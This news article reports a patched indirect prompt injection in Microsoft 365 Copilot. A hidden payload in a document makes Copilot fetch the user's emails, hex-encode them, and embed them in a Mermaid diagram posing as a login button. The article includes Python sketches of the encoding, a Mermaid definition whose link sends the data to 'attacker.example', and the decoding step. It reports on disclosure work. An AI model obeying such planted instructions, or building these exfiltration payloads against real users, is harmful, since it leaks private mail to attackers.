Updated Microsoft has fixed a security hole in Microsoft 365 Copilot that allowed attackers to trick the AI assistant into stealing sensitive tenant data – such as emails – via indirect prompt injection attacks.

But the researcher who found and reported the bug to Redmond won't get a bug bounty payout, as Microsoft decided that M365 Copilot isn't in scope for its vulnerability reward program.

The attack relies on indirect prompt injection – embedding malicious instructions in content the model ingests and can act upon, as opposed to direct prompt injection, in which someone submits malicious instructions to an AI system directly.

Researcher Adam Logue discovered the data-stealing exploit, which abuses M365 Copilot's built-in support for Mermaid diagrams, a JavaScript-based tool that lets users generate diagrams from text.

In addition to being integrated with M365 Copilot, Mermaid diagrams also support CSS.

"This opens up some interesting attack vectors for data exfiltration, as M365 Copilot can generate a Mermaid diagram on the fly and can include data retrieved from other tools in the diagram," Logue wrote in a blog post about the bug and how to exploit it.

As a proof of concept, Logue asked M365 Copilot to summarize a specially crafted financial report document containing a hidden indirect prompt injection payload, triggered by the seemingly innocuous "summarize this document" request.

The payload uses M365 Copilot's search_enterprise_emails tool to fetch the user's recent emails, and instructs the AI assistant to generate a bulleted list of the fetched contents, hex-encode the output, and split the hex-encoded string into multiple lines of up to 30 characters each.
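
For illustration, a minimal Python sketch of that encoding scheme – hex-encode the gathered text and break it into 30-character lines – looks something like this (the sample email text is invented; only the hex encoding and 30-character chunking come from Logue's description):

```python
# Sketch of the exfiltration encoding described above.
# The email text is a made-up placeholder; the 30-character chunking mirrors the payload's instructions.
email_summary = "- Q3 invoice approved\n- Payroll run scheduled for Friday"

hex_blob = email_summary.encode("utf-8").hex()                      # hex-encode the fetched content
chunks = [hex_blob[i:i + 30] for i in range(0, len(hex_blob), 30)]  # split into lines of up to 30 chars

for line in chunks:
    print(line)
```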

Logue then exploited M365 Copilot's Mermaid integration to generate a diagram that looked like a login button, along with a notice that the document couldn't be viewed unless the user clicked it. The fake login button contained CSS style elements plus a hyperlink to an attacker-controlled server – in this case, Logue's Burp Collaborator server.
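
Logue's exact payload isn't reproduced here, but a hedged sketch gives the flavor: the Python below assembles a Mermaid flowchart definition with a CSS-styled node posing as a login button and a click handler pointing at a made-up attacker URL that carries the hex chunks in its query string. The domain, labels, and styling are all assumptions for illustration.

```python
# Illustrative only: assemble a Mermaid definition resembling a fake login button.
# The attacker domain, labels, and styling are assumptions, not Logue's actual payload.
hex_chunks = ["2d2051332069", "6e766f696365"]  # stand-in chunks of hex-encoded email data

exfil_url = "https://attacker.example/collect?d=" + "".join(hex_chunks)

mermaid_definition = f"""flowchart TD
    notice["This document is protected. Log in to view it."]
    login["Login"]
    notice --> login
    click login "{exfil_url}" "Open document"
    style login fill:#0078d4,color:#ffffff,stroke:#005a9e
"""

print(mermaid_definition)
```

Rendered, a definition like this just looks like a notice with a button next to it – but its click target quietly carries the encoded data.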

When a user clicked the button, the hex-encoded tenant data – in this case, a bulleted list of recent emails – was sent to the malicious server. From there, an attacker could decode the data and do all the nefarious things criminals do with stolen data, like sell it to other crims, extort the victim for its return, dig account numbers and/or credentials out of the messages, and other super fun stuff – if you're evil.
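
Recovering the plaintext on the attacker's side is trivial. Assuming the chunks arrive in order, a one-liner like this would do it (values carried over from the illustrative sketches above):

```python
# Reassemble and decode the hex chunks captured by the attacker-controlled server.
received_chunks = ["2d2051332069", "6e766f696365"]  # stand-in values from the sketch above

plaintext = bytes.fromhex("".join(received_chunks)).decode("utf-8")
print(plaintext)  # prints "- Q3 invoice"
```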

Logue reported the flaw to Microsoft, and Redmond told him it had patched the vulnerability – which he verified by attempting the attack again and failing.

Microsoft responded to The Register after deadline, but declined to say what the patch involved or how it mitigated the security issue.

"We appreciate the work of Adam Logue in identifying and responsibly reporting this through a coordinated disclosure," a spokesperson said. "We have fixed the issue outlined in this report. Customers do not need to take any action to be protected from this technique."

Logue didn't receive a payout for finding and reporting the flaw because, as of now, Microsoft 365 Copilot isn't a product considered in scope for the bug bounty program. However, Redmond says it is always reviewing the published program criteria to align with evolving technologies and attacks, so – fingers crossed – future M365 Copilot bug hunters may earn a reward for their work. ®

